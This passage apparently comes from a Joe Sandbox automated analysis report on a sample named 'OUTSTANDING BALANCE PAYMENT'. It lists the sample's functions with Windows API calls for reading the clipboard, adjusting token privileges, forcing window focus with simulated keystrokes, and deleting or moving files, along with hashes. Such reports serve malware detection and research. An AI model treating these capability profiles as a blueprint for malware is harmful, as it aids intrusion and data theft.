                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID:
                                                                  • API String ID: 82841172-0
                                                                  • Opcode ID: d2146ee4b883f8b5a0be824738504a3a6e6053e4f6c3fc363b053bb00f1a955e
                                                                  • Instruction ID: d45ab38367a1643536f75528a3a109bfd76377db30840698b322c6f79a500903
                                                                  • Opcode Fuzzy Hash: d2146ee4b883f8b5a0be824738504a3a6e6053e4f6c3fc363b053bb00f1a955e
                                                                  • Instruction Fuzzy Hash: B4E0CD365002245FC711A694CC46FEA779DDF88790F050075F905D7245DD64D9818A90
                                                                  Function 01227AA4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction ID: b18a2d31494742287562fe3e566466f6482a9f9417bd4ad8cb0b5cf8c6429270
                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction Fuzzy Hash: CEE0BF7494410DEFDB00DFE4D5496DD7BB4EF04311F1005A1FD05D7680DB309E548A62
                                                                  Function 01227AA8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01227AB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: 41f54338351962703ad5bfa795e50e99bd1db6b9bd0805a473ce649f3b703e16
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: 5CE0E67494410DEFDB00DFF4D54969D7BB4EF04301F1001A1FD01D2280DB309E508A62

                                                                  Non-executed Functions

                                                                  Function 002EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 002EF87D
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002EF8DC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002EF919
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002EF940
                                                                  • SendMessageW.USER32 ref: 002EF966
                                                                  • _wcsncpy.LIBCMT ref: 002EF9D2
                                                                  • GetKeyState.USER32(00000011), ref: 002EF9F3
                                                                  • GetKeyState.USER32(00000009), ref: 002EFA00
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002EFA16
                                                                  • GetKeyState.USER32(00000010), ref: 002EFA20
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002EFA4F
                                                                  • SendMessageW.USER32 ref: 002EFA72
                                                                  • SendMessageW.USER32(?,00001030,?,002EE059), ref: 002EFB6F
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 002EFB85
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002EFB96
                                                                  • SetCapture.USER32(?), ref: 002EFB9F
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFC03
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002EFC0F
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 002EFC29
                                                                  • ReleaseCapture.USER32 ref: 002EFC34
                                                                  • GetCursorPos.USER32(?), ref: 002EFC69
                                                                  • ScreenToClient.USER32(?,?), ref: 002EFC76
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 002EFCD8
                                                                  • SendMessageW.USER32 ref: 002EFD02
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 002EFD41
                                                                  • SendMessageW.USER32 ref: 002EFD6C
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002EFD84
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002EFD8F
                                                                  • GetCursorPos.USER32(?), ref: 002EFDB0
                                                                  • ScreenToClient.USER32(?,?), ref: 002EFDBD
                                                                  • GetParent.USER32(?), ref: 002EFDD9
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 002EFE3F
                                                                  • SendMessageW.USER32 ref: 002EFE6F
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFEC5
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002EFEF1
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 002EFF19
                                                                  • SendMessageW.USER32 ref: 002EFF3C
                                                                  • ClientToScreen.USER32(?,?), ref: 002EFF86
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002EFFB6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002F004B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 2516578528-4164748364
                                                                  • Opcode ID: 65c9681b43d6cc3dbc16849823be891254e33001c7bb1fc7aaa0ba11a85d6c48
                                                                  • Instruction ID: 954141d022d591f907a9e089e665213da2a1d1404ec9c78102e1aae222c59416
                                                                  • Opcode Fuzzy Hash: 65c9681b43d6cc3dbc16849823be891254e33001c7bb1fc7aaa0ba11a85d6c48
                                                                  • Instruction Fuzzy Hash: B732FD74624286EFDB11CF64C980BAABBE8FF49344F540629FA95C72A1C731EC60CB51
                                                                  Function 002EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002EB1CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 3850602802-328681919
                                                                  • Opcode ID: 211725662dc437f95f93e3ce999bd45dc830d4be2206eedc6a797c76c4e663c6
                                                                  • Instruction ID: 4b92c6daf0c65213e175ee1d5907261f699c4b9446a0f95ca69cbdc655d6a8c5
                                                                  • Opcode Fuzzy Hash: 211725662dc437f95f93e3ce999bd45dc830d4be2206eedc6a797c76c4e663c6
                                                                  • Instruction Fuzzy Hash: 2812FF71560249ABEB268F66CC59FAF7BF8FF45320F50411AF90ADA2D1DBB09811CB11
                                                                  Function 0029EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0029EB4A
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F3AEA
                                                                  • IsIconic.USER32(000000FF), ref: 002F3AF3
                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 002F3B00
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3B0A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002F3B20
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002F3B27
                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002F3B33
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002F3B44
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002F3B4C
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 002F3B54
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3B57
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B6C
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B77
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B81
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B86
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B8F
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3B94
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 002F3B9E
                                                                  • keybd_event.USER32(00000012,00000000), ref: 002F3BA3
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002F3BA6
                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 002F3BCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: ced217a7e321d22a36d23ccf737f921750babe650fcf1be0214559250105667f
                                                                  • Instruction ID: fb54d0410dca74fc49d376a364d053f292accab1cc699b4e49e9aec90bea2c13
                                                                  • Opcode Fuzzy Hash: ced217a7e321d22a36d23ccf737f921750babe650fcf1be0214559250105667f
                                                                  • Instruction Fuzzy Hash: CC31C671A5031CBFEB215FA58C59F7F7EACEB44B94F104026FB05EA1D0DAB15D10AAA0
                                                                  Function 002BACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                    • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                    • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
                                                                  • _memset.LIBCMT ref: 002BAD08
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002BAD5A
                                                                  • CloseHandle.KERNEL32(?), ref: 002BAD6B
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002BAD82
                                                                  • GetProcessWindowStation.USER32 ref: 002BAD9B
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 002BADA5
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002BADBF
                                                                    • Part of subcall function 002BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002BACC0), ref: 002BAB99
                                                                    • Part of subcall function 002BAB84: CloseHandle.KERNEL32(?,?,002BACC0), ref: 002BABAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $H*3$default$winsta0
                                                                  • API String ID: 2063423040-967494751
                                                                  • Opcode ID: b41ba5fb2bd3b459f2d221037927131e3c4ca7a06419669c4771e4323d213a43
                                                                  • Instruction ID: a6b000a0f31009ae534003f377cc462bea22736ee780bb0ab706c29ae11c2306
                                                                  • Opcode Fuzzy Hash: b41ba5fb2bd3b459f2d221037927131e3c4ca7a06419669c4771e4323d213a43
                                                                  • Instruction Fuzzy Hash: 0381A07181120AAFEF12DFA4DC45AEEBBBCFF04344F04412AF914A2161DB728E64DB61
                                                                  Function 002C60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C5FA6,?), ref: 002C6ED8
                                                                    • Part of subcall function 002C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C5FA6,?), ref: 002C6EF1
                                                                    • Part of subcall function 002C725E: __wsplitpath.LIBCMT ref: 002C727B
                                                                    • Part of subcall function 002C725E: __wsplitpath.LIBCMT ref: 002C728E
                                                                    • Part of subcall function 002C72CB: GetFileAttributesW.KERNEL32(?,002C6019), ref: 002C72CC
                                                                  • _wcscat.LIBCMT ref: 002C6149
                                                                  • _wcscat.LIBCMT ref: 002C6167
                                                                  • __wsplitpath.LIBCMT ref: 002C618E
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002C61A4
                                                                  • _wcscpy.LIBCMT ref: 002C6209
                                                                  • _wcscat.LIBCMT ref: 002C621C
                                                                  • _wcscat.LIBCMT ref: 002C622F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 002C625D
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C626E
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C6289
                                                                  • MoveFileW.KERNEL32(?,?), ref: 002C6298
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 002C62AD
                                                                  • DeleteFileW.KERNEL32(?), ref: 002C62BE
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002C62E1
                                                                  • FindClose.KERNEL32(00000000), ref: 002C62FD
                                                                  • FindClose.KERNEL32(00000000), ref: 002C630B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                  • String ID: \*.*$p1#v`K$v
                                                                  • API String ID: 1917200108-1732502266
                                                                  • Opcode ID: 55a3bceb0d267c8d5d7d041e46973d3d5e70536a49c7ea29bdba7172d99d85f5
                                                                  • Instruction ID: b61aa65983c169b3602187520c698a707284a94e5a6c056aa3c83687ac112ebd
                                                                  • Opcode Fuzzy Hash: 55a3bceb0d267c8d5d7d041e46973d3d5e70536a49c7ea29bdba7172d99d85f5
                                                                  • Instruction Fuzzy Hash: 67512F7281911D6ACB21EB91CC48EEB77FCAF05300F0901EAE585E3141DE769799CFA5
                                                                  Function 002D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenClipboard.USER32(0031DC00), ref: 002D6B36
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 002D6B44
                                                                  • GetClipboardData.USER32(0000000D), ref: 002D6B4C
                                                                  • CloseClipboard.USER32 ref: 002D6B58
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002D6B74
                                                                  • CloseClipboard.USER32 ref: 002D6B7E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002D6B93
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 002D6BA0
                                                                  • GetClipboardData.USER32(00000001), ref: 002D6BA8
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002D6BB5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002D6BE9
                                                                  • CloseClipboard.USER32 ref: 002D6CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: c691b2d9e1d5f1efab50f5d582c859432b4004a8b2ba655f24d95ba5c5da0f6b
                                                                  • Instruction ID: b73c3eb5c7675ec11670beffab299d191e0baed3d574b841ef3f536bb15949f4
                                                                  • Opcode Fuzzy Hash: c691b2d9e1d5f1efab50f5d582c859432b4004a8b2ba655f24d95ba5c5da0f6b
                                                                  • Instruction Fuzzy Hash: 78519C35221206ABD301AFA0CCAAF6E77ECAF84B14F00042BF546E62D1DF70DC158B62
                                                                  Function 002CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CF62B
                                                                  • FindClose.KERNEL32(00000000), ref: 002CF67F
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CF6A4
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002CF6BB
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 002CF6E2
                                                                  • __swprintf.LIBCMT ref: 002CF72E
                                                                  • __swprintf.LIBCMT ref: 002CF767
                                                                  • __swprintf.LIBCMT ref: 002CF7BB
                                                                    • Part of subcall function 002A172B: __woutput_l.LIBCMT ref: 002A1784
                                                                  • __swprintf.LIBCMT ref: 002CF809
                                                                  • __swprintf.LIBCMT ref: 002CF858
                                                                  • __swprintf.LIBCMT ref: 002CF8A7
                                                                  • __swprintf.LIBCMT ref: 002CF8F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 835046349-2428617273
                                                                  • Opcode ID: 5d34a015910dfbd88263d6f22b4555c9b9a3ddf15c2f0886e435a112688a3bdc
                                                                  • Instruction ID: cd41ef4d264ef05862306eff7e2828299efc1a361ff66e78e0248b0556116c3b
                                                                  • Opcode Fuzzy Hash: 5d34a015910dfbd88263d6f22b4555c9b9a3ddf15c2f0886e435a112688a3bdc
                                                                  • Instruction Fuzzy Hash: 78A14FB2419340ABC705EBA4CD81DAFB7ECAF98704F440D2EF59582192EB34D958CB62
                                                                  Function 002D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002D1B50
                                                                  • _wcscmp.LIBCMT ref: 002D1B65
                                                                  • _wcscmp.LIBCMT ref: 002D1B7C
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002D1B8E
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 002D1BA8
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002D1BC0
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1BCB
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002D1BE7
                                                                  • _wcscmp.LIBCMT ref: 002D1C0E
                                                                  • _wcscmp.LIBCMT ref: 002D1C25
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D1C37
                                                                  • SetCurrentDirectoryW.KERNEL32(003339FC), ref: 002D1C55
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002D1C5F
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1C6C
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1C7C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 20714997796ca770e6da2f9fa207db2b7c3a4cb8aa64b36b8e7cf1bdd2bd1c90
                                                                  • Instruction ID: 880087ac2e15c47d28d67d15e3e26a214c9c74dd99893b261ebaa42ff87b25be
                                                                  • Opcode Fuzzy Hash: 20714997796ca770e6da2f9fa207db2b7c3a4cb8aa64b36b8e7cf1bdd2bd1c90
                                                                  • Instruction Fuzzy Hash: D931D332A5121ABBDF15AFF0DC49BDE77AC9F05324F104197E801E2191EB70DEA58E64
                                                                  Function 002D1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002D1CAB
                                                                  • _wcscmp.LIBCMT ref: 002D1CC0
                                                                  • _wcscmp.LIBCMT ref: 002D1CD7
                                                                    • Part of subcall function 002C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002C6BEF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002D1D06
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1D11
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 002D1D2D
                                                                  • _wcscmp.LIBCMT ref: 002D1D54
                                                                  • _wcscmp.LIBCMT ref: 002D1D6B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D1D7D
                                                                  • SetCurrentDirectoryW.KERNEL32(003339FC), ref: 002D1D9B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 002D1DA5
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1DB2
                                                                  • FindClose.KERNEL32(00000000), ref: 002D1DC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: 426d8cb149d9bef493231735361a338ea29042f98d5a1de43f364d8436d128f3
                                                                  • Instruction ID: cb9553ab885bfd549931a84767a663341aba75df1b0b2aac7d81fc9504809566
